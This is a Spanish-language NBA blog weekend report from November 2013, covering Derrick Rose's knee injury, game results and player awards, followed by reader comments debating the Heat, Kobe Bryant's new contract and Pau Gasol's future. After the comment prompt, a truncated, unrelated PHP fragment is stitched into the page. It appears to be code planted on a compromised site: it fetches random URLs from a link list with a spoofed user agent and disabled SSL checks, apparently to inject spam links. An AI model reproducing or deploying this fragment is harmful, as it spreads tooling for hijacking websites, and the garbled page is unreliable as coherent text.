Informe del fin de semana: Viernes negro

25 de November de 2013 por TheDeerHunter

“A falta de resonancia magnética se dice que Rose tiene una rotura del ligamento anterior de la rodilla ahora menos buena. Hay un estudio que prueba que si un deportista se rompe el ligamento anterior de una rodilla, en un 80% de los casos se suele recaer con la misma lesion en la misma rodilla o en la otra. Y Marc parece casi oficial que son 6 semanas de baja” The Wolf

Pues ocurrió. Bombazo de lesión de Derrick Rose el viernes, aunque finalmente “sólo” se quedaba en menisco roto. Absoluta tragedia baloncestística en un jugador que estaba llamado a ser antológico. También caían Marc e Iguodala, aunque este último caso es significativamente menos grave.

Deportivamente veíamos las exhibiciones de Caron Butler y John Wall que ni siquiera servían para que sus equipos ganaran a Sixers y Raptors respectivamente, el buen rendimiento de Pau Gasol ante Warriors que hace que sus Lakers comiencen a ver la luz del sol, la consolidación de Blazers ante los deprimidos Bulls y el palizón de los Spurs a los Grizzlies sin Marc. Destacaba también la victoria de Hawks ante Pistons, los Pelicans que llegan al 50% de victorias con su victoria ante Cavaliers y que desde que volvió Ryan Anderson muestran otra cara, y una nueva derrota de los Nets, esta vez ante los Wolves. Los Pacers doblegaron con facilidad a los Celtics y los Suns recuperaron la senda ganadora ante Bobcats. 

“Que desastre los Knicks. Ahí no defiende ni el tato y el figura de JR debe tener algun trapicheo con Woodson para que le deje tirarse las que quiera. Decían que la última vez que tiró por encima del 50% fue el 3 de Abril de este año. Y bien los Wizards que empiezan a entonarse con un gran Wall. Luego te pones 3 minutos del Spurs – Cavs y dices, pero estos tios juegan a lo mismo? En ataque es algo sangrante” Rumbero

El sábado los Knicks sufrieron su 5ª derrota consecutiva por culpa de unos Wizards que, con paso lento pero seguro, van mejorando de la mano de John Wall. En el extremo opuesto se encuentran los Blazers que lograron su 10ª victoria consecutiva ante Warriors, igual que Spurs ante Cavaliers. CP3 y LeBron anotaron canastas ganadoras ante Kings y Magic respectivamente y Hibbert se merendaba a unos Sixers en los que MCW enamora. Los Nuggets rompían la racha victoriosa de los Mavs y Rockets vencían a Wolves con Aaron Brooks ejerciendo de James Harden. Finalmente los Celtics terminaban con una mala racha de 6 derrotas en Atlanta y unos tristísimos Bucks perdían por octava vez consecutiva, en esta ocasión ante los Bobcats que están muy cómodos con su 50% de victorias.

“Impresionante el repaso de Clippers a los Bulls aprovechando las bajas de Rose y Butler y un dia dulce en el tiro, creo que han acabado sobre el 60% en TC” Mamba_blanca

Pues sí, esta madrugada hemos asistido al repaso que los Clippers le han propinado a unos Bulls en estado de shock. Los de Chicago deberán reinventarse de nuevo, volver a la defensa que tan buenos resultados les dio el año pasado y confiar, otra vez, en que Rose vuelva en playoffs. Los Thunder también les han pegado una buena paliza a unos Jazz que son, sin duda, el peor equipo de la competición. Ayer, Burke y Marvin Williams salieron de titulares pero la imagen siguió siendo patética. Los Lakers consiguieron llegar al 50% de victorias a costa de los Kings, con un Pau Gasol destacado y los Suns, a pesar de seguir son Bledsoe, no han tenido muchos problemas para derrotar a unos Magic a los que ha vuelto Tobias Harris. Habrá que ver como queda ahora la rotación.

“Final 106-94. Partidazo de Stuckey al cual le entraba todo, Monroe también bastante bien con un 18-11. En los Nets no se salva nadie excepto JoJo, además no juegan a nada. Su única estrategia para remontar darle el balón a Joe Johnson y que este invente. Me parece que Kidd no se come el turrón, mi pregunta ¿Podrían fichar a Hollins?” Blade Petrovic

Y los Nets volvieron a caer, esta vez ante los Nets. Ni lo más pesimistas del lugar podían imaginar semejante hecatombe. Sólo han ganado 3 de sus 13 partidos disputados y la verdad, no parece haber ningún signo de mejora. Cada día van a peor. A lo mejor el despido de Jason Kidd no revierte la situación, pero se antoja urgente. No parece mala la idea de llamar a Lionel Hollins y empezar de 0.

PREMIOS

MVP: Fin de semana redondo para Pau Gasol y Chris Paul. Los 2 equipos de la capital se han llevado los partidos jugados este fin de semana de la mano de sus respectivos líderes. El español ha conseguido 2 dobles-dobles, 24-10 frente los Warriors y 20-10 frente los Kings. El base de los Clippers no se ha quedado atrás aunque el sábado se acabó su racha de dobles-dobles consecutivos, consiguió 22 puntos, 6 rebotes y 9 asistencias frente los Kings. Ayer volvió a las andadas con 16 puntos y 17 asistencias.

Rookie: Suerte que ha vuelto Michael Carter-Williams a alegrar esta sección. El viernes se quedó cerca del triple-doble con 12 puntos, 8 rebotes, 11 asistencias y 5 robos mientras que el sábado se fue a los 29 puntos, 6 rebotes y 7 robos. ¡No te lesiones más!

Sorpresa: Caron Butler fue el mejor de todos los jugadores que saltaron a la cancha el viernes. El de los Bucks se fue a los 38 puntos y 8 rebotes. Otro que ha vuelto a la vida este fin de semana ha sido Aaron Brooks. Por si había pocos bases en Houston, Brooks despertó el sábado ante los Wolves con 26 puntos, 4 rebotes y 5 asistencias en 25 minutos.

Esfuerzo en vano: John Wall ha estado a un nivel sublime este fin de semana pero los Wizards solo han podido  hacerse con una de las 2 victorias. Perdieron ante Toronto a pesar de sus 37 puntos pero ganaron a los Knicks con  31 puntos y 7 asistencias de Wall. Peor suerte ha tenido DeMarcus Cousins que no ha visto recompensado su esfuerzo en ningún partido. Ante los Clippers perdieron de un punto con Cousins bailando al juego interior rival con 29 puntos, 19 rebotes y 7 asistencias, y ayer cayeron ante los Lakers a pesar de su 17-8-7. Ayer, Joe Johnson se cascó un 8 de 10 en triples pero el resultado para los Nets fue el mismo: derrota.

Imágenes | AP Photos / Getty Images

Comenta

25 comentarios a esta entrada

  1. Denise dice:
    #1

    Bueno, a ver hoy quien se mete con los jugadores de clase media de los Clippers. Por cierto, me mola y mucho la camiseta celeste con mangas que lucieron ayer. Si ganase la porra a lo mejor me pedía la de Paul en ese estilo con mangas.

    Está el ruso teniendo paciencia con Kidd, supongo que los jugadores aun estan con él, porque cuando KG y sus secuaces quieran, a Kidd le hacen la cama y fuera.

    Lo de Rose habrá que esperar pero creo que difícilmente va a ser ya un jugador franquicia en un equipo con aspiraciones al anillo. A nivel mental eso hace mas daño incluso que a nivel fisico, y a partir de ahora las penetraciones imposibles metiendose entre 2 y 3 rivales se las va a pensar antes de meterse en esos jardines. Lo peor para él es que no es un tirador, si al menos tuviese un tiro exterior consistente el daño sería menor, pero siendo un jugador que vive de las penetraciones, el asunto lo veo chungo.

    Lo de Utah es escandaloso, Orlando el año pasado perdía partidos pero la mayoría los disputaba hasta el final, lo de Utah es un tankeo desproporcional en los despachos pero en la pista tambien. Y de Kanter y de Favors esperaba mucho mas, teniendo en cuenta el equipo que tienen, podría estar haciendo numerazos. 2 decepciones para mi.

    La mayor sorpresa positiva para mi son los Blazers. Ojo a la temporada que está haciendo el señor Matthews, encontrando la regularidad que quizas le haya faltado en años anteriores. Y McCallum aun no ha jugado. Lo mas negativo es el rendimiento de Leonard y de Wright, esperaba mucho mas de estos dos jugadores.
    Y el rol de Claver, el esperado, agitatoallas o viendo partidos desde su casa, por mucho que en otros lados nos vendiesen la moto de lo que le aportaba a los Blazers en cancha.

      Citar

  2. HisRoyalAirness dice:
    #2

    La lesión de Rose no es nada, es lo que tuvi Westbrook y ahi lo tienes. Si la otra rodilla está bien, qué parecía que sí, podemos tener Derrick Rose para rato.

    Y si no lo digo reviento: en semejante mierda de conferencia, sin Rondo, Rose, Stoudamirr muerto y habiéndose quitado a Howard de encima…de verdad vamos a valorar la “dimastía” de los Heat sin tener esto en cuenta? En fin

      Citar

  3. Esteban dice:
    #3

    Bueno, sin rose, ni rondo ni howard, los rivales del heat, son y siempre han sido los pacers y vamos a ver como termina ese duelo este año

      Citar

  4. Denise dice:
    #4

    HisRoyalAirness:

    Y si no lo digo reviento: en semejante mierda de conferencia, sin Rondo, Rose, Stoudamirr muerto y habiéndose quitado a Howard de encima…de verdad vamos a valorar la “dimastía” de los Heat sin tener esto en cuenta? En fin

    Yo a los Heat no les quito ningun merito. Parece como si a los Heat alguien les hubiera regalado algo, tambien ellos han tenido sus lesiones.

      Citar

  5. HisRoyalAirness dice:
    #5

    Denise: Yo a los Heat no les quito ningun merito.Parece como si a los Heat alguien les hubiera regalado algo, tambien ellos han tenido sus lesiones.

    Los Heat se formaron en una conferencia que ya era una mierda, debilitaron a dos equipos como Cleveland y Raptors (dos posibles rivales menos) y se juntaron en un equipo que tenía ya a uno de los 3 mejores jugadores de la competición. Debilitaron aún más su conferencia para cumplir su objetivo. Eso es planificación deportiva. Eso sumado a la lesión de Rose, de Rondo y el envejecimiento de los Celtics.
    Yo sí les quitó mérito, pero es mi opinión. Este año voy a muerte con los Pacers

      Citar

  6. Denise dice:
    #6

    HisRoyalAirness: LosHeat se formaron en una conferencia que ya era una mierda, debilitaron a dos equipos como Cleveland y Raptors (dos posibles rivales menos) y se juntaron en un equipo que tenía ya a uno de los 3 mejores jugadores de la competición. Debilitaron aún más su conferencia para cumplir su objetivo. Eso es planificación deportiva. Eso sumado a la lesión de Rose, de Rondo y el envejecimiento de los Celtics.
    Yo sí les quitó mérito, pero es mi opinión. Este año voy a muerte con los Pacers

    Los Heat debilitaron a dos equipos?? Pero esto que es, la NBA ó la guerra franco-prusiana?
    Lebron y Bosh acbaron sus contratos con sus respectivos equipos y ficharon por Miami porque le salieron de las pelotas. ¿Que tiene que ver Miami en esto? ¿ Deben los Heat abastecerse ahora de jugadores de Draft para tener honor?
    Venga hombre, asi es el deporte, cada equipo ficha y vende jugadores, a ver si ahora los Heat tienen que pedir perdon por hacerse con Lebron y Wade?

    Tu razonamiento solo se entiende si eres un fanatico taliban anti-Heat, por esa regla de 3 quitemosle meritos tambien a los Lakers del Threepeat que debilitaron a los Magic quitandoles a O’Neal.
    Y a los Lakers del 2004 que aunque fracasaron se llevaron a Malone y a Payton. Y a tantos y tantos equipos…

      Citar

  7. HisRoyalAirness dice:
    #7

    Denise: Los Heat debilitaron a dos equipos?? Pero esto que es, la NBA ó la guerra franco-prusiana?
    Lebron y Bosh acbaron sus contratos con sus respectivos equipos y ficharon por Miami porque le salieron de las pelotas. ¿Que tiene que ver Miami en esto? ¿ Deben los Heat abastecerse ahora de jugadores de Draft para tener honor?
    Venga hombre, asi es el deporte, cada equipo ficha y vende jugadores, a ver si ahora los Heat tienen que pedir perdon por hacerse con Lebron y Wade?

    Tu razonamiento solo se entiende si eres un fanatico taliban anti-Heat, por esa regla de 3 quitemosle meritos tambien a los Lakers del Threepeat que debilitaron a los Magic quitandoles a O’Neal.
    Y a los Lakers del 2004 que aunque fracasaron se llevaron a Malone y a Payton. Y a tantos y tantos equipos…

    Lakers y Orlando juegan en conferencias diferentes, eso para empezar.
    No he hablado de honor ni de pedir disculpas pero esto no fue cosa de Pat Riley, se sabe que Lebron, Bosh y Wade se reunieron y se pusieron de acuerdo (lo cual está prohibido). Shaquille se fue a un equipo que no tenía nada y tardó varios años en hacer algo y Malone y Payton fueron arrastrándose en busca del anillo,cobrando por lo bajo.
    Se pusieron de acuerdo 3 de los 5 titulares del All-Star del Este para quedarse en una conferencia donde sabían que iban a tener fácil llegar a las finales. En playoffs llevan 3 años teniendo 2 rondas de paseo.

      Citar

  8. Denise dice:
    #8

    HisRoyalAirness: Lakers y Orlando juegan en conferencias diferentes, eso para empezar.
    No he hablado de honor ni de pedir disculpas pero esto no fue cosa de Pat Riley, se sabe que Lebron, Bosh y Wade se reunieron y se pusieron de acuerdo (lo cual está prohibido). Shaquille se fue a un equipo que no tenía nada y tardó varios años en hacer algo y Malone y Payton fueron arrastrándose en busca del anillo,cobrando por lo bajo.
    Se pusieron de acuerdo3 de los 5 titulares del All-Star del Este para quedarse en una conferencia donde sabían que iban a tener fácil llegar a las finales. En playoffs llevan 3 años teniendo 2 rondas de paseo.

    Pero no han cometido ninguna ilegalidad. Todo está dentro de las leyes, tambien para reunir a 3 all-stars de ese calibre debes renunciar a tener profundidad de banquillo, vease con que ha lidiado Spoelstra en la posicion de C en estos años.
    Ademas el deporte afortunadamente no es matematica. No son 2+2=4. Obviamente con Lebron, Wade y Bosh hay mas posibilidades de anillo que con OJ Mayo, Ilyasova y Caron Butler; pero para ganar el anillo no te basta simplemente tener a los mejores jugadores y ala, que jueguen solos…detras debe haber un trabajo tactico, tenico y psicologico que los Heat por mucho que se lo quieran echar por tierra lo ha tenido.

    Si pensais que con tener buenos jugadores ya basta para llevarte el anillo por la cara, quitemosle todo el merito tambien a los Celtics de los años 60′, ó a Phil Jackson.

    Ademas, si siempre ganase el anillo el que mas plantilla tiene sobre el papel, el año pasado no habría ganado Miami sino los Lakers y fijate el ridiculo que hicieron.

      Citar

  9. Denise dice:
    #9

    2011-12. La rotación de Miami fue Chalmers-Wade-Lebron-Bosh-Joel Anthony con un banquillo util de Cole-Miller-Battier-Haslem. Más unos cuantos rellenos para los minutos de la basura y que en ese año jugaron poquisimo como Turiaf, James Jones, Terel Harris, Eddy Curry, Pittman y Juwan Howard.

    El Big 3 está cojonudo, pero el resto está cogido con pinzas. Seguramente como plantilla, había muchos mejores equipos mas completos, equilibrados y profundos ese año.

    2012-13. El equipo es mas profundo aunque con jugadores cada vez mas veteranos
    Chalmers-Wade-Lebron-Bosh-Andersen
    Rotacion util. Cole (que se ha quedado en nada, tras un inicio prometedor), Battier (34 años), Allen (37 años), Miller (32 años) y Haslem (32 años), Rashard Lewis (33 años y super acabado) y Joel Anthony (un cero a la izquierda).
    Obviamente es de los mejores equipos de la liga, pero como conjunto en sí, tampoco lo veo un equipazo como para apostarte tu salario mensual en que van a ganar la liga.

      Citar

  10. HisRoyalAirness dice:
    #10

    Los grandes equipos que citas fueron totalmente accidentales. Draft o algún traspaso suelto. Es como sí en los 80 esperan todos a terminar contrato y se juntan Barkley, Jordan y Olajuwon con 27 años. A mí me parece una vergüenza y, de hecho a los veteranos también. No hay precedentes porque todos han querido competir contra sus grandes contemporáneos, no unirse a ellos.
    Te pongo otra vez el eterno ejemplo de Jordán. Para qué voy a seguir en el Este chocando contra Celtics y Pistons continuamente cuando puedo juntarme con Charles y otro más de mi conferencia asegurándome que haya dos equipos menos a los que temer y saber que siempre llegaré a finales de conferencia?
    No hablo de ética o resquicios legales sino de grandeza. Lo llevo diciendo 3 años. Tampoco me gustaba los Celtics del Big Three pero por lo menos habían sido traspasos

      Citar

  11. HisRoyalAirness dice:
    #11

    No digo que sean el mejor equipo de la liga, de hecho no me lo parecen, pero jugando en esa conferencia te aseguras, mínimo, finales de conferencia

      Citar

  12. Denise dice:
    #12

    Sin ir mas lejos, y lo dije en el analisis previo de los Heat, este año los Pacers tienen mejor plantilla que los Heat, los Bulls si lo de Rose no es tan grave, tambien puede mojarles la oreja. Los Nets con un entrenador serio y en condiciones y dosificando a Garnett y a Pierce podrían meterle mano en una serie porque tiene un señor banquillo amplio, variado y profundo.
    Incluso los Pistons con ese tremendo Big 3 interno Smith-Monroe-Drummond los veo capaces de eliminarlos.

      Citar

  13. Simon dice:
    #13

    es oficial: Rose se acaba la temporada para Rose…

      Citar

  14. Esteban dice:
    #14

    los lakers le renovaron a kobe por dos años, el primero por 23 y el segundo po 24 millones? no me lo creo… con ese contrato y el de nash ya pueden irse despidiendo de ganar otro liga

      Citar

  15. Denise dice:
    #15

    Esteban:
    los lakers le renovaron a kobe por dos años, el primero por 23 y el segundo po 24 millones? no me lo creo… con ese contrato y el de nash ya pueden irse despidiendo de ganar otro liga

    ¿Donde has visto esas cifras? Si son ciertas, autentico suicidio de Kupchak, pesima gestión de los Buss permitiendo esta situación kamikaze al menos deportivamente y una muestra de la agonía y la gula de Kobe anteponiendo el dinero antes que la posibilidad de ganar anillos y superando a Jordan.

      Citar

  16. Denise dice:
    #16

    Simon:
    es oficial: Rose se acaba la temporada para Rose…

    RIP Derrick Rose como jugador franquicia y los Bulls hipotecados para los proximos 4 años.

      Citar

  17. Heineken dice:
    #17

    Denise: ¿Donde has visto esas cifras? Si son ciertas, autentico suicidio de Kupchak, pesima gestión de los Buss permitiendo esta situación kamikaze al menos deportivamente y una muestra de la agonía y la gula de Kobe anteponiendo el dinero antes que la posibilidad de ganar anillos y superando a Jordan.

    En twitter ya circula la foto de la firma, 23 y 25 millones. Se convierte así en el jugador que más dinero ha ganado mediante contrato en la NBA por encima de Kevin Garnett.

      Citar

  18. Denise dice:
    #18

    Heineken: En twitter ya circula la foto de la firma, 23 y 25 millones. Se convierte así en el jugador que más dinero ha ganado mediante contrato en la NBA por encima de Kevin Garnett.

    Ahora falta que al “hermano” de Kobe, Pau, le renueven por 15 kilos y todochachipiruli y megaguay…xD

    PD: Quiero saber que piensan los aficionados de Lakers pero con la cabeza fria. Es una locura y mas aun sin todavia haber jugado este año y no saber ni como está fisicamente.

      Citar

  19. Jose Luis dice:
    #19

    A mi, como Laker, me parece fatal. 10 millones estaba bien, quizá incluso 15. Tanto no, y con esto apretarán mucho a Pau para que renueve muy bajito… veremos.

      Citar

  20. Simon dice:
    #20

    Demasiada pasta para Kobe… dudas de edad y lesión aparte… Es que ya se están cortando muchas posibilidades de traer mas de un agente libre importante… entre Kobe y Nash se van a comer 33 kilos del tope salarial… 25 kilos para rehacer el resto del equipo complento ( porque visto lo visto con Nash tampoco podemos contar ). A nada que traigan un máximo… el resto tendrán que ser contratos mínimos o excepciones… muy negro el futuro Lakers a corto plazo.

      Citar

  21. HisRoyalAirness dice:
    #21

    Denise: RIP DerrickRose como jugador franquicia y los Bulls hipotecados para los proximos 4 años.

    A lo mejor se te está yendo un poco la olla. Es una rotura de menisco, una lesión “menor”, y en la rodilla contraria

      Citar

  22. Mamba_Blanca dice:
    #22

    Impresionante la metedura de pata de los Lakers, Kobe no ha jugado ni un partido tras la lesión y se le renueva por 24 kilos. Llegados a este momento, me reafirmo en que Kobe no quiere superar a Jordan en anillos, sino como maximo anotador historico; porque siendo el, renuevas por unos 15 millones y permites que fichen buenos jugadores en verano para el año que viene intentar el asalto al titulo.

    Lo peor de esto, es como comentaba Jose Luis, que a Pau intentaran renovarlo (si lo intentan) muy bajo, ya que tienen que compensar el tope salarial.

      Citar

  23. nba dice:
    #23

    coincido contigo Mamba, los Lakers no deberian intentar renovar a Gasol, creo que Pau ha visto las orejas al lobo y que Kobe parece que poco a poco ya se ha recuperado, y se esta poniendo las pilas pero ante equipos del monton y tras casi una semana de descanso en el Staples.
    Renovando por esa cantidad a Kobe no hay espacio para una oferta para Pau superior a 6-7 millones,
    que vaya a la agencia libre a ver quien le ofrece mas, nadie, creo yo, visto su rendimiento de las ultimas temporadas

      Citar

  24. sergius dice:
    #24

    Hombre Pau por 6 o 7 kilos podria ir (no se situacion de limite salarial) a:

    Golden State
    Oklahoma
    Chicago
    Indiana
    Spurs
    Grizzlies

    Yo creo que aun es muy aprovechable. Puede ser un suplente de lujo. Otra cosa es que lo acepte.

      Citar

  25. Blade Petrovic dice:
    #25

    Derrick Arenas 2.0 Rose, ojala no le pase a los Bulls como le ha pasado a las Wizards que con tiempo y algún traspaso lo han conseguido ahorrar. Por otra parte Kobe para mí siempre quiere ser igual que Jordan (que sus últimos contratos…), yo creo que debería cobrar de 10 a 15, entonces veo muy complicadala renovación de Gasol, al menos si quiere mantener dinero..Yo creo que se merece 10 millones. Ya suenan Love e Irving, Irving no lo veo porque Kobe nunca ha jugado con un buen base…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>